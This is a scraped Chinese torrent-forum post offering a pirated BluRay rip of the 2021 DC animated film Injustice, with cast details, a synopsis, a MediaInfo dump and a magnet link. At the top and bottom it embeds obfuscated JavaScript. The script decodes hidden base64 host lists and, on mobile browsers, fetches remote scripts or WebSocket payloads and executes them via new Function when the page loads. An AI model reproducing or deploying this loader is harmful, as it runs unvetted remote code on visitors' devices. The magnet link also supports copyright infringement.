不义[双语字幕].Injustice.2021.1080p.BluRay.DTS.x265-10bit 3.52GB

版主小s 1月前 201

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 不义 / 不义联盟

◎片 名 Injustice

◎年 代 2021

◎产 地 美国

◎类 别 冒险

◎语 言 英语

◎上映日期 2021-10-09(美国)

◎IMDb链接 https://www.imdb.com/title/tt5012504/

◎豆瓣评分 4.5/10 (1366人评价)

◎豆瓣链接 https://movie.douban.com/subject/35467746/

◎片 长 78分钟

◎编 剧 汤姆·泰勒 Tom Taylor (id:1451799)

◎演 员 吉莉安·雅各布斯 Gillian Jacobs (id:1274992)

安松·蒙特 Anson Mount (id:1032099)

劳拉·贝莉 Laura Bailey (id:1191469)

贾斯汀·哈特雷 Justin Hartley (id:1004662)

珍妮特·瓦尼 Janet Varney (id:1004941)

奥利弗·赫斯顿 Oliver Hudson (id:1049649)

弗雷德·塔特西奥 Fred Tatasciore (id:1320585)

布兰登·迈克尔·霍尔 Brandon Micheal Hall (id:1362107)

布莱恩·T·德莱尼 Brian T. Delaney (id:1206163)

扎克·卡利森 Zach Callison (id:1228975)

◎标 签 DC / 动画 / 超级英雄 / 美国 / 科幻 / 2021 / 美国动画 / 动作

◎简 介

华纳家庭娱乐将打造根据游戏《不义联盟:人间之神》(Injustice: Gods Among Us)改编的动画影片。华纳在[蝙蝠侠:漫长的万圣节(下)]新闻稿中透露,其在8月10日发行的蓝光光碟中将包括这部游改动画影片的预告。该片具体细节暂未知。原版游戏讲述在杀死小丑之后,超人又继续处决罪犯,他变得越来越腐败。五年后,超人成立了“一个地球政权”,以维护全球和平,但以蝙蝠侠为首的许多DC超级英雄联合起来,反对该政权。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 142039295793508715945755393493924389917 (0x6ADBC5F74E533A0E04A79DBEFC05241D)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 3.52 GiB

  8. Duration : 1 h 18 min

  9. Overall bit rate : 6 415 kb/s

  10. Movie name : Injustice 2021 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-10-25 04:50:57

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 18 min

  21. Bit rate : 4 826 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.097

  31. Stream size : 2.65 GiB (75%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Encoding settings : lslices=4 / deblock(tC=-1:B=-1)

  35. Default : Yes

  36. Forced : No


  37. Audio

  38. ID : 2

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 1 h 18 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 509 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossy

  51. Stream size : 848 MiB (24%)

  52. Title : English

  53. Language : English

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 14 min

  63. Bit rate : 41.6 kb/s

  64. Count of elements : 2618

  65. Stream size : 22.3 MiB (1%)

  66. Title : ENG

  67. Language : English

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 14 min

  77. Bit rate : 24.8 kb/s

  78. Count of elements : 2101

  79. Stream size : 13.2 MiB (0%)

  80. Title : CHS

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Text #3

  85. ID : 5

  86. Format : PGS

  87. Muxing mode : zlib

  88. Codec ID : S_HDMV/PGS

  89. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  90. Duration : 1 h 14 min

  91. Bit rate : 25.7 kb/s

  92. Count of elements : 2101

  93. Stream size : 13.6 MiB (0%)

  94. Title : CHT

  95. Language : Chinese

  96. Default : No

  97. Forced : No


  98. Text #4

  99. ID : 6

  100. Format : PGS

  101. Muxing mode : zlib

  102. Codec ID : S_HDMV/PGS

  103. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  104. Duration : 1 h 14 min

  105. Bit rate : 43.9 kb/s

  106. Count of elements : 2101

  107. Stream size : 23.3 MiB (1%)

  108. Title : CHS&ENG

  109. Language : Chinese

  110. Default : No

  111. Forced : No


  112. Text #5

  113. ID : 7

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 1 h 14 min

  119. Bit rate : 44.8 kb/s

  120. Count of elements : 2101

  121. Stream size : 23.8 MiB (1%)

  122. Title : CHT&ENG

  123. Language : Chinese

  124. Default : No

  125. Forced : No


  126. Menu

  127. 00:00:00.000 : en:Chapter 01

  128. 00:02:32.986 : en:Chapter 02

  129. 00:11:20.430 : en:Chapter 03

  130. 00:18:43.956 : en:Chapter 04

  131. 00:25:14.847 : en:Chapter 05

  132. 00:33:41.519 : en:Chapter 06

  133. 00:43:12.465 : en:Chapter 07

  134. 00:52:17.092 : en:Chapter 08

  135. 01:00:00.972 : en:Chapter 09

  136. 01:09:52.271 : en:Chapter 10

  137. 01:15:57.303 : en:Chapter 11




复制代码


TAGS 冒险

磁力链:
  • magnet:?xt=urn:btih:033C593B3AC1DBB3B246AA4994138E223214C614

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};